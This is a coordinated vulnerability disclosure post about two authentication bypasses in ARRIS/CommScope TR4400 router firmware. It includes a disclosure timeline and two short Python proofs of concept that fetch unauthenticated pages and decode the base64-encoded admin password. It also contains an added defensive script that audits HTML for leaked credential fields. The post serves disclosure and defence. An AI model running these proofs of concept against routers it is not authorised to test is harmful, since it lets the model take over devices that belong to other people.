Robert Houtenbrink
3 min read · Aug 22, 2019

CommScope Vulnerability — Authentication Bypass in ARRIS TR4400 Firmware Version A1.00.004–180301

— — — — — — — — — — — — — — — — — — — — — — — — — —

UPDATE SEPTEMBER 5th 2019 — CVEs acquired!

— — — — — — — — — — — — — — — — — — — — — — — — — —

It’s worth mentioning that although ARRIS was the original manufacturer of this router, ARRIS was acquired by CommScope. To keep things simple, I’ll refer to the company as CommScope for this writeup.

During late April 2019 I discovered two authentication bypasses to the administrative interface in my home router. I decided to take this opportunity to participate in a coordinated disclosure with CommScope, as I didn’t want to drop the exploit code online and submit for CVEs. I reached out to CommScope via their “Product Security Issue or Vulnerability” portal (KUDOS to companies who have product security portals), and they were able to successfully reproduce the issue and quickly began working on a firmware update. Then, CommScope passed the updated firmware to Charter (Spectrum) to deliver a nationwide out-of-band patch around August 20th, 2019. Working through CommScope, Charter patched my device first so I could confirm the fix. Then, Charter deployed the nationwide out-of-band patch.

All in all, working with CommScope and Charter was a delightful experience. It was clear that both companies care about the security of their products and were very attentive to the issue. CommScope updated me constantly on the status of the firmware build, the next steps they were taking, when to expect the patch, etc. There was always plenty of communication.

The only piece of advice I’d like to give to anyone else trying to get CVEs for their ISP’s customer-provided equipment (CPE) is: there are a lot of moving parts. I found the bugs in CommScope’s hardware; however, Charter is ultimately responsible for delivering the patch to customers. One should expect a somewhat lengthier remediation timeline, as two companies (manufacturer and ISP) need to work in tandem to deliver the patch to customers.

OK, now for the technical stuff (which won’t take long). Bypassing authentication in the ARRIS TR4400 was rather trivial: the firmware embeds the current administrative password, base64-encoded, in two web pages that any user connected to the Wi-Fi can fetch without logging in. The two pages are http://192.168.1.1/basic_sett.html and http://192.168.1.1/login.html. I’ve written two tiny proofs of concept that simply grab the encoded password from the page and decode it.

PoC One — basic_sett.html

import base64
import requests
from bs4 import BeautifulSoup


def get_current_password():
    # Fetch the unauthenticated page that embeds the current admin password
    r = requests.get('http://192.168.1.1/basic_sett.html')
    soup = BeautifulSoup(r.content, 'html.parser')
    # The password sits base64-encoded in the "cur_passwd" input field
    input_tag = soup.find_all(attrs={'name': 'cur_passwd'})
    encoded = input_tag[0]['value']
    decoded = base64.b64decode(encoded)
    print(decoded.decode())


get_current_password()

PoC Two — login.html

import base64
import requests
from bs4 import BeautifulSoup


def get_current_password():
    # Same leak, different page: the login page itself carries the password
    r = requests.get('http://192.168.1.1/login.html')
    soup = BeautifulSoup(r.content, 'html.parser')
    # The password sits base64-encoded in the "cur_passwd" input field
    input_tag = soup.find_all(attrs={'name': 'cur_passwd'})
    encoded = input_tag[0]['value']
    decoded = base64.b64decode(encoded)
    print(decoded.decode())


get_current_password()
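The fix for this class of bug is simply that the unauthenticated pages must not echo the credential at all, and an operator confirming a firmware update wants a check that fails loudly if the field comes back. The following is an added example, not part of the original writeup or CommScope’s code: an offline audit routine that parses an HTML page with the standard library (no bs4 or network access), flags any input field with a credential-looking name (cur_passwd, passwd, password) that carries a non-empty value, and notes when that value is valid base64 decoding to printable text, the exact pattern described above. It deliberately reports only field names and reasons, never the secret. The function names, the suspicious-name list and both HTML samples are constructed for this example.

```python
import base64
import string
from html.parser import HTMLParser


class _InputCollector(HTMLParser):
    """Collect (name, value) for every <input> element in a page."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = dict(attrs)
        if "name" in a and a.get("value") is not None:
            self.inputs.append((a["name"], a["value"]))


def decodes_to_printable(value):
    """True if value is strict base64 whose plaintext is non-empty printable ASCII."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False
    if not raw:
        return False
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return False
    return text.isprintable()


# Hypothetical list of substrings that mark a field as credential-bearing.
SUSPICIOUS_NAMES = ("cur_passwd", "passwd", "password")


def find_credential_leaks(html_text, suspicious_names=SUSPICIOUS_NAMES):
    """Return [(field_name, reason)] for inputs that look like an embedded credential.

    The field value itself is intentionally not returned, so the report can be
    logged or attached to a ticket without copying the secret around.
    """
    parser = _InputCollector()
    parser.feed(html_text)
    findings = []
    for name, value in parser.inputs:
        if not value:
            continue  # an empty credential field is the expected, safe state
        if not any(s in name.lower() for s in suspicious_names):
            continue
        if decodes_to_printable(value):
            findings.append((name, "credential-named field with base64-decodable printable value"))
        else:
            findings.append((name, "credential-named field carries a value"))
    return findings


# Constructed sample of a vulnerable page: the password is echoed base64-encoded.
SAMPLE_VULNERABLE_PAGE = """<html><body><form>
<input type="hidden" name="cur_passwd" value="cGFzc3dvcmQxMjM=">
<input type="text" name="username" value="admin">
<input type="hidden" name="csrf_token" value="YWJj">
</form></body></html>"""

# Constructed sample of a fixed page: the field is gone and nothing else is secret.
SAMPLE_FIXED_PAGE = """<html><body><form>
<input type="text" name="username" value="">
<input type="password" name="new_passwd" value="">
<input type="hidden" name="csrf_token" value="YWJj">
</form></body></html>"""


if __name__ == "__main__":
    for label, page in (("vulnerable", SAMPLE_VULNERABLE_PAGE), ("fixed", SAMPLE_FIXED_PAGE)):
        leaks = find_credential_leaks(page)
        print(f"{label}: {'LEAK ' + str(leaks) if leaks else 'no credential fields exposed'}")
```

Run it against a page fetched from the device without a session cookie; an empty result on both basic_sett.html and login.html is the condition to look for after a firmware update. The csrf_token sample is there to show that the check keys on the field name first, so ordinary base64-looking tokens do not produce noise.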

Disclosure timeline:

April 26th, 2019 Initial report submitted

April 30th, 2019 Second attempt to contact

April 30th, 2019 Contact made from CommScope: They are looking into it.

June 10th, 2019 CommScope successfully reproduced the issue and a patch is underway.

July 19th, 2019 Charter sets target date for firmware deployment for mid-August

August 15th, 2019 Charter pushes the patch to my router.

August 19th, 2019 I confirmed the issue was fixed.

August 22nd, 2019 Coordinated/Responsible disclosure. Writeup release date.